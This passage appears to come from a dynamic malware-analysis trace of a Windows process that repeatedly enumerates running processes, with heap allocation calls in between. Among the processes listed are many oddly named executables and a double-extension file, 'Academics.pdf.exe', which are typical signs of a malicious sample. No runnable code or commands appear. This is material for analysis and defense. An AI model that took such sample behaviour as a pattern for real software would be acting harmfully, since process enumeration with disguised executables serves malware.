th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0304.546] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0304.547] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.548] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0304.549] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.550] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0304.550] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0304.551] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0304.552] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0304.553] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.553] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.554] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.555] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.556] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.557] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0304.557] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.558] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.559] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0304.560] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0304.561] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0304.561] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0304.562] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.563] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0304.564] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0304.565] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0304.565] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0304.566] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0304.567] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0304.568] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0304.569] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0304.569] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0304.570] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0304.571] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0304.572] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0304.573] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0304.573] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0304.574] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0304.575] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0304.576] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0304.577] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0304.578] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0304.578] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.579] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.580] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0304.581] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.582] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0304.582] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.583] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0304.584] CloseHandle (hObject=0x294) returned 1 [0304.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0304.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0304.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0304.584] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0304.584] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0304.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0304.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0304.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.585] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0304.587] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.588] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0304.588] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0304.589] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.590] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0304.591] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.592] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0304.592] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0304.593] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0304.594] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0304.595] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.596] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.596] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.597] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.598] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.599] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0304.600] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.600] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.601] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0304.602] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0304.603] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0304.604] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0304.604] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.605] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0304.606] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0304.607] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0304.608] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0304.608] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0304.609] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0304.610] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0304.611] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 